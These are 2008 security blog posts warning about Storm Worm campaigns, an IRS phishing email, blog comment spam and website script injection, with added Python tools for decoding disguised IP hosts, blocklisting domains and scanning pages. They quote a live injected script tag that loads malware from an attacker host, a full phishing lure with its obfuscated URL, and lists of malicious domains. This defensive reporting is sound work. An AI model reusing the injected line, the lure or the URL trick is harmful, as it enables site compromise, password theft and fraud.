
Update Your Adobe Flash Software ASAP!

May 27th, 2008 by Steven Adair

It appears that exploits for Adobe Flash vulnerabilities are now live and in the wild on several sites. This is not good, considering that some of the websites involved in the recent mass SQL injection attacks are aiming to exploit this vulnerability. Basically, if you can’t recall upgrading Flash recently, you probably need to go ahead and do it.

You can check your current Flash version by clicking here.

You can upgrade to the latest version of Flash by clicking here.

Don’t wait - just upgrade right now!

Posted in Malware, Exploits, Random | 1 Comment »

Interesting IRS Phishing Method

May 20th, 2008 by Steven Adair

The phishers out there are once again finding new ways to obfuscate their URLs in attempts to fool end users. I am pretty sure I saw this method mentioned elsewhere recently, but I cannot recall where. In any event, this recent phish found its way into the SPAM folder on one of my e-mail accounts. Notice the URL they provided:

Subject: Tax Notification
From: “Internal Revenue Service” <taxrefund@1x8c.8xdb95d4.irs.gov>
Date: Tue, May 20, 2008 6:36 am

Internal Revenue Service (IRS)
United States Department of the Treasury

Dear Taxpayer,

After the last annual calculations of your fiscal
activity we have determined that you are eligible
to receive a tax refund of $184.80.

Please submit the tax refund request and allow us
6-9 days in order to process it.

A refund can be delayed for a variety of reasons.
For example submitting invalid records or applying
after the deadline.

To access the form for your tax refund, use the following personalized link:

http://0x7C.0xDB11D1/www.irs.gov/

Regards,
Internal Revenue Service

Document Reference: (0x7C.0xDB11D1).

Notice that the URL is http://0x7C.0xDB11D1/www.irs.gov/ and that they used 0x7C.0xDB11D1 as the “Document Reference” in an attempt to make it look more official. Well, it turns out that 0x7C.0xDB11D1 is just an IP address written in the dotted-hexadecimal shorthand that inet_aton() and web browsers accept: 0x7C is 124, and 0xDB11D1 fills the remaining three bytes (219.17.209), so the host is 124.219.17.209, an address in Taiwan. The “www.irs.gov” that follows is only a directory name on the attacker’s server, not the site you are visiting. Visiting this IP address or the URL above ends up redirecting you to http://www.comtipps.de/www.irs.gov/index.htm?memberID=0x7C.0xDB.0x11.0xD1 (the same address again, this time written one byte at a time).
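To make that conversion reproducible, here is a small decoder written for this page as an added example (it is not code from the original post). It handles the dotted-hexadecimal and shorthand IPv4 forms that inet_aton() and browsers of the time accept, going a little beyond the phish above by covering all four part counts plus decimal and octal parts, and it pulls the host out of a URL so that the /www.irs.gov/ directory in the path is not mistaken for the destination site:

```python
"""Decode inet_aton()-style IPv4 hosts such as 0x7C.0xDB11D1.

Added example for this page, not code from the original post.  Classic
inet_aton() accepts one to four dot-separated parts, each written in
decimal, octal (leading 0) or hex (leading 0x); the last part fills all
the remaining bytes.  Browsers of the era accepted the same shorthand,
which is what the phishing URL above relies on.
"""
import re
from urllib.parse import urlsplit

# One part: hex (0x..), octal (leading 0) or plain decimal.
_PART = re.compile(r"^(0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")


def _part_value(text):
    """Parse one dotted part with C radix rules; None if malformed."""
    if not _PART.match(text):
        return None
    if text[:2].lower() == "0x":
        return int(text[2:], 16)
    if len(text) > 1 and text[0] == "0":
        return int(text, 8)
    return int(text, 10)


def decode_inet_aton(host):
    """Return the canonical dotted quad for a shorthand host, or None.

    a.b.c.d -> four 8-bit parts; a.b.c -> c is 16 bits; a.b -> b is 24
    bits; a -> the whole 32-bit address.  Any part that overflows its
    width makes the host invalid, as in inet_aton().
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_part_value(p) for p in parts]
    if any(v is None for v in values):
        return None
    widths = [8] * (len(values) - 1) + [32 - 8 * (len(values) - 1)]
    addr = 0
    for value, width in zip(values, widths):
        if value >= 1 << width:
            return None
        addr = (addr << width) | value
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def resolve_url_host(url):
    """Return (host, path) for a URL, with a shorthand IP host decoded.

    The host is whatever precedes the first single slash after the
    scheme; a directory such as /www.irs.gov/ in the path says nothing
    about where the request actually goes.
    """
    parts = urlsplit(url)
    host = parts.hostname or ""
    return decode_inet_aton(host) or host, parts.path


if __name__ == "__main__":
    for sample in ("http://0x7C.0xDB11D1/www.irs.gov/",
                   "http://0x7C.0xDB.0x11.0xD1/",
                   "http://2094731729/",
                   "http://www.irs.gov/"):
        print(sample, "->", resolve_url_host(sample))
```

A mail gateway or proxy can use decode_inet_aton() as a cheap filter: a link whose host decodes to a bare IP address, in any of these spellings, is almost never a legitimate bank or government site.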

This then tries to get your social security number, credit card information (including CVV code and ATM PIN), date of birth, full name and address, phone number, and finally e-mail address (wouldn’t one assume they already have this if they e-mailed you? :D). Be on the lookout for this slightly different take on an old trick.

Posted in Phishing, Links | No Comments »

CNN.COM Target for Chinese Hackers

April 19th, 2008 by Steven Adair

It appears that CNN has been and will be the target of choice for Chinese hackers to show their displeasure with Western media coverage of the “pro-independence protests in Tibet.” It would seem that some people in China have been offended by this coverage and are calling for attacks, according to the website The Dark Visitor. They have provided details on several Chinese websites calling for attacks on www.cnn.com starting at 8:00 PM Beijing Time (8:00 AM EDT or 12:00 PM GMT) today, April 19, 2008. However, according to another update on The Dark Visitor’s website, these attacks have since been called off and are to be rescheduled.

According to a recent update on the CNN website, they have already observed several attacks that occurred this past Thursday. They took action to limit access to the site from certain regions and users in Asia may have experienced minor disruptions. These attacks appear to be either coincidental or preemptive in nature as they came two days earlier than called for. Arbor Networks is also monitoring this situation and has reported they have observed at least 36 different attacks thus far.

While the attacks have been “called off” for now, it will be interesting to see if they continue regardless — as scheduled or at a later date. It appears that attacks are expected and are being planned for. We can hope that they are unsuccessful regardless of the level of participation. We will update more if we learn anything new.

Posted in Random | 4 Comments »

New Storm Worm Domains Active with Exploits

April 10th, 2008 by Steven Adair

It appears that in addition to “supersameas.com”, the Storm Worm is now using and spamming itself out with several new domain names. These domain names are all registered with Chinese registrars and have been around since at least February, but are just now starting to be used. In addition to serving up the executables for download, they are also attempting to fire exploits at users running the Internet Explorer browser. It is highly recommended that you do NOT visit these domains. Here is the list that is currently active:

biggetonething.cn
gasperoblue.cn
giftapplys.cn
gribontruck.cn
limpodrift.cn
loveinlive.cn
newoneforyou.cn
normocock.cn
orthelike.com
supersameas.com
thingforyoutoo.cn

They are coming through via e-mail as always and are continuing their assault against Blogger (blogspot.com) sites. Searching Google shows the standard “love”-related campaign. However, there is at least one result on Google showing politically motivated e-mails being sent as well. At least one spam reported to the Google Group “news.admin.net-abuse.sightings” shows an e-mail with the subject “Cowen confirmed as next Irish premier” and a body of “Police fire on protesters in Nepal” followed by a link to one of the above domains.

If you visit these sites with IE, you will quickly find yourself being attacked via different ActiveX objects. The first set of exploits will attempt to download “load.exe” to the system. It will then ultimately redirect the visitor to “flow.php” which is full of obfuscated JavaScript. It is recommended that you block the above domain names and do not visit them.

Posted in Malware, Exploits, Spam, Storm Worm | No Comments »

More Fake Video Codec Pages.. Trojan.Delf? Trojan.Zlob? Nope - Storm Worm!

April 8th, 2008 by Steven Adair

There’s a new round of Storm Worm e-mails going around taking advantage of our favorite technique, showing people what looks like a video and telling them they’re missing a codec to view it. Only these guys are using a rather blunt name for the files this time: StormCodec.exe and StormCodec8.exe - Not very subtle for the “Storm” Worm.

Users are lured this time by an e-mail that wants them to visit the fast-flux domain “supersameas.com”. You can protect yourself and your organization at this juncture by blocking this domain. Once on the site there is a video-like image in the middle with the following message:

You have no Storm Codec on your PC.
Download it and choose either “Open” or “Run”.
Enjoy your multimedia experience!

The video and download links point to the aforementioned files. Tip: You don’t want Storm Codec on your PC! :D Thanks to Jose from Arbor Networks for pointing out the update to me, otherwise I probably wouldn’t have noticed this until much later.

Posted in Malware, Spam, Storm Worm | 2 Comments »

SecurityZone.org RSS Feed Available

April 6th, 2008 by Steven Adair

As you might know, this blog runs on WordPress, which already supports RSS feeds. It seems a few of you out there and several search engine/social media sites have already manually located the URLs to subscribe to my RSS feed. In an effort to be more RSS and Web 2.0 friendly, I am now signed up with Feedburner and have put a direct link to my RSS feed on this website (continue reading). Hopefully this change is relatively seamless for those that are already subscribed.

For anyone that is not subscribed, you can now click the RSS Feed link on the right panel on my website or subscribe via http://feeds.feedburner.com/securityzone. If you check in on my site regularly or even infrequently and have an RSS reader, I’d recommend signing up. It’ll help you keep up with my sporadic update schedule that not even I can predict!

Posted in Random, Links | No Comments »

New Storm Worm Blogspot/Blogger Campaign - superdrugtesting.com

April 6th, 2008 by Steven Adair

You might have received some e-mails in the last few hours that link to some strange-looking blogspot.com pages. A recent example I received a few hours ago pointed me to hxxp://aflmdiovanrd.blogspot.com/. The web page then wants you to click to download files named “love.exe” or “withlove.exe”, as previously seen with the Valentine’s Day Storm Worm attack.

They are now using a new domain name for their fast-flux network. Each of these URLs presently links to “superdrugtesting.com” followed by the aforementioned binary names. They haven’t used an actual domain name or Google’s Blogger service with these attacks since the Christmas/New Year time frame. Looks like they are back at it again with a new technique.

[Screenshot of the blogspot.com lure page; image not reproduced here.]

Be on the lookout for these e-mails and consider blocking “superdrugtesting.com” on your networks if possible. Since this domain name fronts a fast-flux network, you must block it by domain name and not by IP address: the name resolves to thousands of constantly changing infected hosts.
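As an added example (not part of the original posts), the following script matches URLs seen in a proxy or mail log against the Storm Worm domains listed in this post and in the April 10 post above. It matches on the domain name and its subdomains rather than on resolved IP addresses, which is the point about fast-flux hosting made above. The log lines are constructed for the example and their field layout (timestamp, client, status, method, URL) is an assumption, not a real log format:

```python
"""Match logged URLs against a Storm Worm domain blocklist.

Added example for this page, not code from the original posts.  A
fast-flux domain resolves to a constantly changing set of infected
hosts, so the match is made on the host name (the domain itself or any
subdomain of it), never on a resolved IP address.
"""
from urllib.parse import urlsplit

# Domains named in the Storm Worm posts above (April 2008).
STORM_DOMAINS = frozenset({
    "supersameas.com", "superdrugtesting.com", "biggetonething.cn",
    "gasperoblue.cn", "giftapplys.cn", "gribontruck.cn", "limpodrift.cn",
    "loveinlive.cn", "newoneforyou.cn", "normocock.cn", "orthelike.com",
    "thingforyoutoo.cn",
})


def blocked_domain(url, blocklist=STORM_DOMAINS):
    """Return the blocklist entry matching the URL's host, or None.

    www.supersameas.com matches supersameas.com; the look-alike
    notsupersameas.com does not, because matching is per DNS label.
    """
    host = (urlsplit(url).hostname or "").rstrip(".")
    labels = host.split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in blocklist:
            return candidate
    return None


# Constructed sample log (not real traffic).  Assumed layout:
# timestamp client status method url
SAMPLE_LOG = """\
1207900001.123 10.0.0.5 TCP_MISS/200 GET http://www.example.com/index.html
1207900002.456 10.0.0.7 TCP_MISS/200 GET http://supersameas.com/StormCodec.exe
1207900003.789 10.0.0.9 TCP_MISS/200 GET http://www.superdrugtesting.com/love.exe
1207900004.012 10.0.0.9 TCP_MISS/200 GET http://notsupersameas.com/
1207900005.345 10.0.0.3 TCP_MISS/200 GET http://gribontruck.cn/flow.php
"""


def find_hits(log_text, blocklist=STORM_DOMAINS):
    """Return (client, url, matched_domain) for every line that hits."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        client, url = fields[1], fields[4]
        match = blocked_domain(url, blocklist)
        if match:
            hits.append((client, url, match))
    return hits


if __name__ == "__main__":
    for client, url, match in find_hits(SAMPLE_LOG):
        print(f"{client} requested {url} (blocked: {match})")
```

The blogspot.com lure pages are not in the list on purpose: they sit on a legitimate service, so the landing domain the lure links to is what gets blocked.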

Edit: Let me add that if you were infected with this run of the Storm Worm or the recent Valentine’s Day campaign they did, you would most likely have “aromis.exe” running in your taskbar (not hidden this time) and it will reside in your root WINDOWS folder.

Posted in Malware, Spam, Storm Worm | No Comments »

April Fool’s Day Storm Worm Campaign

March 31st, 2008 by Steven Adair

No jokes here - just a quick update on the ever exciting Storm Worm. It seems today it started out on an April Fool’s Day campaign aimed at infecting more systems. It’s still pointing you to infected machines by giving you a URL to an IP address. Right now the file names are “foolsday.exe“, “funny.exe“, and “kickme.exe“.

[Screenshot of the full website; image not reproduced here.]

Nothing too fancy this time around again and it seems they’re a little late in their delivery. Normally they start a little earlier. Anyway, just be on the look out and don’t infect yourself accidentally.

Posted in Spam, Storm Worm | No Comments »

Evil Blog Comment Spam Domains

March 16th, 2008 by Steven Adair

I have written a post or two in the past about comment spam on this blog. However, after having more time and a larger sample, I can easily tell you the 13 domains that are nearly the bane of my comment area’s existence. These 13 domains all belong to the same individual or group, who continually bombard my blogs with comment spam. They have been doing this for about 6 months now and always use different IP addresses. The following domain names are always used:

airline333tickets.com
airline379tickets.com
cialis-l-pills.com
cialis-gl-pills.com
new-music-mp3.com
payday333loans.com
payday-gl-loans.com
phentermine-gl-pills.com
phentermine-1-pills.com
viagra-77-pills.com
viagra-gl-pills.com
xanax777pills.com
xanax-gl-pills.com

What is even more interesting is that these guys also easily get past my comment spam honeypot. They haven’t ever been caught by it. My comment spam has been reduced by 80% or so, and I now receive only a couple of new spams a day that aren’t caught by the honeypot. These, however, make it right through each time. It seems that all of the domain names involved are hosted on one of the following three IP addresses (at least right now):

72.9.109.250
72.9.109.251
72.9.109.253

These are all under a hosting provider at Ezzi.net. No idea if these are legitimately paid for boxes or compromised. I do not have evidence one way or another. I just know it’s really shady to spam so heavily from so many different IP addresses. :)

Just doing a Google search on a few of these domains, like “airline333tickets.com” and “xanax777pills.com”, reveals over 65,000 search results. It would seem I am not the only one being heavily spammed by these guys. They’ve left hundreds of blog comment spams in my queue. Here is an example from earlier today:

—–

alumnimb | triath@Ced.com | phentermine-1-pills.com | IP: 68.185.223.151

How do you do…
Good stuff, very nicely done.
Good stuff, very nicely done!
http://viagra-77-pills.com/discount__viagra.html
http://viagra-77-pills.com/cheap–viagra.html

I simply mad about this forum!
There was merrily!

Like! Thank you!
The Author, you - super hero!
http://airline333tickets.com/allegiant_airline_tickets.html
http://cialis-l-pills.com/cialis_10_levitra.html
http://xanax777pills.com/order_10_xanax.htm

I am glad to find this forum !
Excellent forum, added to favorites!
http://phentermine-gl-pills.com/phentermine-9-online.html
http://cialis-l-pills.com/cialis_online.html

Thank you! I delighted!
Pretty nice forum, wants to see much more on it!
I Will be back!

Mar 16, 9:14 AM

—–

As we can see, our commenters make superior use of the English language and link us to a littering of exciting domains to visit. For what it’s worth, all of the domains are registered with either PUBLICDOMAINREGISTRY.COM or ESTDOMAINS.

Posted in Spam | No Comments »

Chinese JavaScript Attack and Mass IFrame Injection Different

March 15th, 2008 by Steven Adair

Hello to all who find this page. I’d like to see if I can at least try to clear up some confusion for a few of you out there. There has been a lot of coverage over the last few days of two completely different attacks that somehow end up being linked together. We will look at both issues, describe them, and show how these attacks are not the same.

Chinese JavaScript Injection Attack

Over the past ten days or so, the following code has found its way into the actual source code of several thousand web pages:

<script src=http://www.2117966.net/fuckjp.js></script>

This JavaScript attempts several things and loads other files that try to exploit the visitor. With this attack there are *NO* iframe tags involved; the single line above is exactly what was injected into the pages’ own source. This is almost identical to the “uc8010.com” attacks of a few months ago. In fact, we were able to find a few pages that appear to have had the line above injected right where they used to refer to uc8010.com. In my opinion it looks very similar but seems to have different goals. In any event, if you pick up the malware from the latest round of these attacks, it will be stealing the passwords you send with Internet Explorer.

An interesting side note worth mention is that Trend Micro’s own website was hit with this attack. They had several pages that can still be viewed in Google’s cache that were injected with the above script. It just goes to show this kind of unfortunate stuff can happen to anyone.

IFrame Injection Attack

The other attack that is getting a lot of attention is one labeled an IFrame injection attack. However, in these instances the websites themselves are NOT actually hacked. Rather, the sites fail to validate or escape search input, and the attackers get search-results pages containing an IFrame that points to a malicious website cached. In theory they could just as easily have used a JavaScript reference; it just happens they used an IFrame in the search terms that get cached. The websites themselves have not been compromised (i.e., if you just browsed the website normally, you would not find yourself under attack). Some of the IFrame targets appear to be attempting to exploit vulnerabilities in the user’s system, and others present fake errors about needing a video codec. From what I have seen and what has been reported, the Zlob trojan is the target install for much or most of this. You can read more information and see examples at http://ddanchev.blogspot.com/.
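The following scanner is an added example written for this page, not code from the original post. It parses saved HTML with Python’s html.parser and reports any <script> or <iframe> whose src points at a host other than the page’s own (or an explicit allowlist). That one check surfaces both cases described above: the fuckjp.js line injected into a page’s source and an IFrame that reached a cached search-results page through an unescaped search term. The HTML samples are constructed for the example, and malicious.example is a placeholder host, not one from the post:

```python
"""Report third-party <script src> and <iframe src> references in a page.

Added example for this page, not code from the original post.  Both
attacks described above end with a reference to an attacker host inside
HTML served by a legitimate site: one as a line injected into the page
source, the other as an IFrame smuggled in through an unescaped search
term.  Flagging any script or iframe loaded from a host other than the
page's own (or an explicit allowlist) surfaces both.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ExternalRefFinder(HTMLParser):
    """Collect (tag, src, host) for script/iframe tags loading elsewhere."""

    def __init__(self, own_host, allow=()):
        super().__init__()
        self.own_host = own_host.lower()
        self.allow = {h.lower() for h in allow}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        src = dict(attrs).get("src")
        if not src:
            return
        host = (urlsplit(src).hostname or "").lower()
        # A relative src has no host and loads from the page's own site.
        if host and host != self.own_host and host not in self.allow:
            self.findings.append((tag, src, host))


def find_external_refs(html, own_host, allow=()):
    """Parse HTML and return the list of third-party script/iframe refs."""
    parser = ExternalRefFinder(own_host, allow)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample 1: a page carrying the injected line quoted above
# (note the unquoted src, exactly as it was injected).
INJECTED_PAGE = """<html><head><title>Example</title>
<script src="/js/site.js"></script>
<script src=http://www.2117966.net/fuckjp.js></script>
</head><body><p>Hello</p></body></html>"""

# Constructed sample 2: a search page that echoed the query unescaped;
# malicious.example is a placeholder host, not one from the post.
SEARCH_PAGE = """<html><body>
<h1>Results for: <iframe src="http://malicious.example/codec.html"
 width="1" height="1"></iframe></h1>
<p>No results found.</p>
</body></html>"""


if __name__ == "__main__":
    for page in (INJECTED_PAGE, SEARCH_PAGE):
        for tag, src, host in find_external_refs(page, "www.example.com"):
            print(f"<{tag}> loads {src} from third-party host {host}")
```

Running this over a crawl of your own site (or over pages pulled from a search engine’s cache, as with the Trend Micro pages mentioned above) gives a short list of hosts to review; legitimate third parties such as an analytics or ad provider go in the allowlist once, and anything else is worth a look.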

Conclusion

As you can see, these are completely unrelated attacks. Other than the fact they involve the Internet and getting malware on a user’s system, there is really no other correlation. However, either group behind both attacks could easily use the techniques of the other, as could any other group. We have seen some interesting tricks from the bad guys lately. We’ll have to see what they come up with next.

Steven

Posted in Malware, Exploits | No Comments »
